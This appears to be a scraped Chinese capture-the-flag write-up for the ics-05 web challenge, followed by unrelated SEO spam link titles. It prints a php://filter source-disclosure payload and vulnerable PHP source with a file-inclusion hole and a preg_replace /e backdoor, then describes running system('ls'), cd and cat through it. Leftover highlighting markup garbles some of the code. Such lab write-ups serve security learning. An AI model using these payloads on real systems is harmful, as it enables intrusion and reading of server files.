当前位置: 首页 > news >正文

企业网站建百度官网app下载安装

企业网站建,百度官网app下载安装,火车票网站建设多少钱,商场网站设计题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?pageindex,出现page这个get参数&#xff0…

题目来源
攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)
1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。
2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码

通过php内置协议直接读取代码
/index.php?page=php://filter/read=convert.base64-encode/resource=index.php
  • 1
  • 2

LFI漏洞的黑盒判断方法:
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。
此处,因为源码中有提示?page=index,所以读一下index.php中的源码
3.在这里插入图片描述进行base64解密

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);

?>
<!DOCTYPE HTML>
<html>

<head>
<meta charset=utf-8>
<meta name=renderer content=webkit>
<meta http-equiv=X-UA-Compatible content=IE=edge,chrome=1>
<meta name=viewport content=width=device-width, initial-scale=1, maximum-scale=1>
<link rel=stylesheet href=layui/css/layui.css media=all>
<title>设备维护中心</title>
<meta charset=utf-8>
</head>

<body>
<ul class=layui-nav>
<li class=layui-nav-item layui-this><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset class=layui-elem-field layui-field-title style=“margin-top: 30px;>
<legend>设备列表</legend>
</fieldset>
<table class=layui-hide id=test></table>
<script type=text/html id=switchTpl>
<! 这里的 checked 的状态只是演示 >
<input type=“checkbox” name=“sex” value="{{d.id}}" lay-skin=“switch” lay-text=“开|关” lay-filter=“checkDemo” {{ d.id==1 0003 ? ‘checked’ : ‘’ }}>
</script>
<script src=layui/layui.js charset=utf-8></script>
<script>
layui.use(‘table’, function() {
var table = layui.table,
form = layui.form;

    table<span class="token punctuation">.</span><span class="token function">render</span><span class="token punctuation">(</span><span class="token punctuation">{</span>elem<span class="token punctuation">:</span> <span class="token string">'#test'</span><span class="token punctuation">,</span>url<span class="token punctuation">:</span> <span class="token string">'/somrthing.json'</span><span class="token punctuation">,</span>cellMinWidth<span class="token punctuation">:</span> <span class="token number">80</span><span class="token punctuation">,</span>cols<span class="token punctuation">:</span> <span class="token punctuation">[</span><span class="token punctuation">[</span><span class="token punctuation">{</span> type<span class="token punctuation">:</span> <span class="token string">'numbers'</span> <span class="token punctuation">}</span><span class="token punctuation">,</span><span class="token punctuation">{</span> type<span class="token punctuation">:</span> <span class="token string">'checkbox'</span> <span class="token punctuation">}</span><span class="token punctuation">,</span><span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'id'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'ID'</span><span class="token punctuation">,</span> width<span class="token punctuation">:</span> <span class="token number">100</span><span class="token punctuation">,</span> unresize<span class="token punctuation">:</span> <span class="token boolean">true</span><span class="token punctuation">,</span> sort<span class="token punctuation">:</span> <span class="token boolean">true</span> <span class="token punctuation">}</span><span class="token punctuation">,</span><span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'name'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'设备名'</span><span class="token punctuation">,</span> templet<span class="token punctuation">:</span> <span class="token string">'#nameTpl'</span> <span class="token punctuation">}</span><span class="token punctuation">,</span><span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'area'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'区域'</span> <span class="token punctuation">}</span><span class="token punctuation">,</span><span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'status'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'维护状态'</span><span class="token punctuation">,</span> minWidth<span class="token punctuation">:</span> <span class="token number">120</span><span class="token punctuation">,</span> sort<span class="token punctuation">:</span> <span class="token boolean">true</span> <span class="token punctuation">}</span><span class="token punctuation">,</span><span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'check'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'设备开关'</span><span class="token punctuation">,</span> width<span class="token punctuation">:</span> <span class="token number">85</span><span class="token punctuation">,</span> templet<span class="token punctuation">:</span> <span class="token string">'#switchTpl'</span><span class="token punctuation">,</span> unresize<span class="token punctuation">:</span> <span class="token boolean">true</span> <span class="token punctuation">}</span><span class="token punctuation">]</span><span class="token punctuation">]</span><span class="token punctuation">,</span>page<span class="token punctuation">:</span> <span class="token boolean">true</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script language-javascript">
layui<span class="token punctuation">.</span><span class="token function">use</span><span class="token punctuation">(</span><span class="token string">'element'</span><span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token keyword">var</span> element <span class="token operator">=</span> layui<span class="token punctuation">.</span>element<span class="token punctuation">;</span> <span class="token comment">//导航的hover效果、二级菜单等功能,需要依赖element模块</span><span class="token comment">//监听导航点击</span>element<span class="token punctuation">.</span><span class="token function">on</span><span class="token punctuation">(</span><span class="token string">'nav(demo)'</span><span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span>elem<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token comment">//console.log(elem)</span>layer<span class="token punctuation">.</span><span class="token function">msg</span><span class="token punctuation">(</span>elem<span class="token punctuation">.</span><span class="token function">text</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>

<?php

$page = $_GET[page];

if (isset($page)) {

if (ctype_alnum($page)) {
?>

<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span><span class="token style-attr language-css"><span class="token attr-name"> <span class="token attr-name">style</span></span><span class="token punctuation">="</span><span class="token attr-value"><span class="token property">text-align</span><span class="token punctuation">:</span>center</span><span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>p</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>lead<span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span><span class="token prolog">&lt;?php echo $page; die();?&gt;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span>

<?php

}else{

?>
<br /><br /><br /><br />
<div style=“text-align:center>
<p class=lead>
<?php

            if (strpos($page, 'input') &gt; 0) {die();}if (strpos($page, 'ta:text') &gt; 0) {die();}if (strpos($page, 'text') &gt; 0) {die();}if ($page === 'index.php') {die('Ok');}include($page);die();?&gt;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span>

<?php
}}

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER[‘HTTP_X_FORWARDED_FOR’] === ‘127.0.0.1’) {

echo "&lt;br &gt;Welcome My Admin ! &lt;br &gt;";$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];if (isset($pattern) &amp;&amp; isset($replacement) &amp;&amp; isset($subject)) {preg_replace($pattern, $replacement, $subject);
}else{die();
}

}
?>
</body>
</html>

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82
  • 83
  • 84
  • 85
  • 86
  • 87
  • 88
  • 89
  • 90
  • 91
  • 92
  • 93
  • 94
  • 95
  • 96
  • 97
  • 98
  • 99
  • 100
  • 101
  • 102
  • 103
  • 104
  • 105
  • 106
  • 107
  • 108
  • 109
  • 110
  • 111
  • 112
  • 113
  • 114
  • 115
  • 116
  • 117
  • 118
  • 119
  • 120
  • 121
  • 122
  • 123
  • 124
  • 125
  • 126
  • 127
  • 128
  • 129
  • 130
  • 131
  • 132
  • 133
  • 134
  • 135
  • 136
  • 137

得到源码后开始审计

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">&gt;</span></span>Welcome My Admin ! <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">&gt;</span></span>";$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];if (isset($pattern) &amp;&amp; isset($replacement) &amp;&amp; isset($subject)) {preg_replace($pattern, $replacement, $subject);
}else{die();
}

}

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15

此处存在preg_replace函数,尝试测试是否存在命令注入漏洞
函数作用:搜索subject中匹配pattern的部分, 以replacement进行替换。
此处明显考察的是preg_replace 函数使用 /e 模式,导致代码执行的问题。也就是说,pat值和sub值相同,rep的代码就会执行。
XFF改成127.0.0.1之后,GET进来三个参数。这里调用了preg_replace函数。并且没有对pat进行过滤,所以可以传入"/e"触发漏洞,触发后replacement的语句是会得到执行的,首先执行一下phpinfo
在这里插入图片描述执行成功
然后使用system(“ls”)尝试获取文件目录
在这里插入图片描述使用cd进入目标文件
system(“cd+s3chahahaDir/flag+%26%26+ls”)
为了避免编码问题,此处不能使用空格隔开,而是使用+,%26%26为&&,意思是当前面命令执行成功时,继续执行后面的命令。
在这里插入图片描述最后使用cat命令获取flag.php中的文件
在这里插入图片描述成功获取flag。

总结:

思路建立:
1.由?page=index联想到可能存在文件包含读源码的漏洞,使用/index.php?page=php://filter/read=convert.base64-encode/resource=index.php获取index.php中源码
2.读取源码后,进行代码审计。发现存在preg_replace函数,尝试利用命令执行漏洞,获取到文件目录,最终找到目标文件
3.读取存在flag的文件,得到flag。
主要技能点:
文件包含漏洞
PHP伪协议中的 php://filter
preg_replace函数引发的命令执行漏洞

http://www.qdjiajiao.com/news/817.html

相关文章:

  • 网站客服代码关键词网络推广企业
  • 中医网站源码手机最新产品新闻
  • 凡科做网站好吗合肥做网站的公司有哪些
  • 易瑞通网站建设实体店引流推广方法
  • 哪里做网站最好百度seo快速排名优化
  • 益阳哪里做网站企业整站优化
  • 用asp.net做的网站营销咨询服务
  • 网站建设网络门户seo接单平台
  • 枣庄网站建设哪家好sem竞价培训班
  • 长沙找工作哪个网站好福州网站建设团队
  • 电子产品网站建设策划书重庆百度快速优化
  • 在线制作海报网站2021全国大学生营销大赛
  • seo外链群发网站南宁百度seo
  • 哪里有网站设计学电子商务网站建设规划方案
  • 贵港市城乡住房建设厅网站搜索引擎推广的费用
  • 企业网络营销方案设计南宁seo主管
  • 那里有专门做印刷品的网站seo工资一般多少
  • 网站谁家做得好app 推广
  • 如何查询网站以建设多长时间2022今天刚刚发生地震了
  • 网站开发文献综述2345网址导航手机版
  • 建设工程信息网查询平台关键词的优化方法
  • wordpress添加文章关键词描述seo点击工具
  • 做网站公司未来的发展方向百度下载安装官方下载
  • 广东省自然资源厅邮箱有名的seo外包公司
  • asp.net做的音乐网站宁国网络推广
  • 网站如何做一张轮播图实时新闻热点
  • 清华大学学生工作做网站常用的关键词有哪些
  • 网站搭建网站制作广告留电话号的网站
  • 吴镇宇做的电影教学网站长清区seo网络优化软件
  • 成都科技网站建设咨百度贴吧网页入口